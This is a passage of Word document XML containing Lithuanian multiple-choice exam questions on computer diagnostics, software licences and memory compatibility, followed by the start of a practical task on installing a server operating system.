      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>rocesoriui</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C023C48" w14:textId="65FD90C8"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c) </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>agrindinės plokštės komponentams</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200055B0" w14:textId="77777777" w:rsidR="0003195F" w:rsidRPr="005A5C28" w:rsidRDefault="0003195F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A8F419" w14:textId="4A4CC737" w:rsidR="006747E4" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">13. Kam </w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>skirtos</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>diagnostikos programos?</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D925519" w14:textId="11229B8E"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a) </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ompiuterio našumui patikrinti</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D799FE" w14:textId="28C26849"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b) </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>ustatyti gedimą</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="673B6D21" w14:textId="5914FBC0"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c) </w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00D762EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>bu atsakymai</w:t>
      </w:r>
      <w:r w:rsidR="00B632EB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> teisingi</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127CF1A5" w14:textId="77777777" w:rsidR="0003195F" w:rsidRPr="005A5C28" w:rsidRDefault="0003195F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E77FCB6" w14:textId="73C70813" w:rsidR="006747E4" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>14. K</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>uri</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> iš išvardintų</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>programinės įrangos dokument</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ų </w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>apibrėžia</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>vartotojo teises į tam tikrą programą?</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56037DE2" w14:textId="6DEE7703"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a) </w:t>
      </w:r>
      <w:r w:rsidR="002361EA" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Patentas</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F012E93" w14:textId="70485762"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b) </w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>icencija</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B64B7AF" w14:textId="22D7F371" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">c) </w:t>
      </w:r>
      <w:r w:rsidR="001711AD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Lipdukas su s</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>erijini</w:t>
      </w:r>
      <w:r w:rsidR="001711AD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> numeri</w:t>
      </w:r>
      <w:r w:rsidR="001711AD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4975A21B" w14:textId="77777777" w:rsidR="0003195F" w:rsidRPr="005A5C28" w:rsidRDefault="0003195F" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E33309" w14:textId="1AFF3181" w:rsidR="006747E4" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>15. Sisteminės plokštės apraše p</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>arašyta</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>„</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>DDR</w:t>
      </w:r>
      <w:r w:rsidR="092D689B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="6B21B169" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2666</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> MHz“, o operatyvioji atmintis </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>DDR</w:t>
      </w:r>
      <w:r w:rsidR="5C36E08D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="580EFAA4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2400</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:iCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> MHz.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ar </w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>veiks</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> operatyvioji atmintis šioje plokštėje?</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD32D36" w14:textId="321099FB" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">a) </w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>aip;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ADFF18" w14:textId="30CDB692" w:rsidR="006747E4" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">b) </w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">bu įrenginiai veiks </w:t>
      </w:r>
      <w:r w:rsidR="320F1421" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2666</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> MHz dažniu</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6827D445" w14:textId="7FBDE13B" w:rsidR="001619E5" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">c) </w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">bu įrenginiai veiks </w:t>
      </w:r>
      <w:r w:rsidR="1CFF759B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2400</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> MHz dažniu</w:t>
      </w:r>
      <w:r w:rsidR="006747E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBCEDCD" w14:textId="77777777" w:rsidR="003B7F5A" w:rsidRPr="005A5C28" w:rsidRDefault="00B7488E" w:rsidP="003B40A9">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:iCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA846EB" w14:textId="2A449C7B" w:rsidR="002F1904" w:rsidRPr="005A5C28" w:rsidRDefault="1C1CA11B" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „</w:t>
      </w:r>
      <w:r w:rsidR="2DC3A71C" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Informacinės sistemos priežiūra ir administravimas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035FC853" w14:textId="563CCD6E" w:rsidR="00D54AAC" w:rsidRPr="005A5C28" w:rsidRDefault="00D54AAC" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32920776" w14:textId="731C0185" w:rsidR="00F54EE6" w:rsidRPr="005A5C28" w:rsidRDefault="622E58E5"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1 </w:t>
      </w:r>
      <w:r w:rsidR="67CD5A9D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis</w:t>
      </w:r>
      <w:r w:rsidR="4A4654EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="4A4654EF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="50C2AA68" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">ĮDIEGTI IR KONFIGŪRUOTI </w:t>
      </w:r>
      <w:r w:rsidR="72D925D1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SERVERIO OPERACINĘ</w:t>
      </w:r>
      <w:r w:rsidR="6520F6E9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SISTEMĄ</w:t>
      </w:r>
      <w:r w:rsidR="50C2AA68" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DE523C" w14:textId="582C6642" w:rsidR="0001674F" w:rsidRPr="005A5C28" w:rsidRDefault="0C671EC8"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UŽDUOTIES SĄLYGA:</w:t>
      </w:r>
      <w:r w:rsidR="50C2AA68" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="689DB4CF" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>audo</w:t>
      </w:r>
      <w:r w:rsidR="002E4AA5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>dami</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
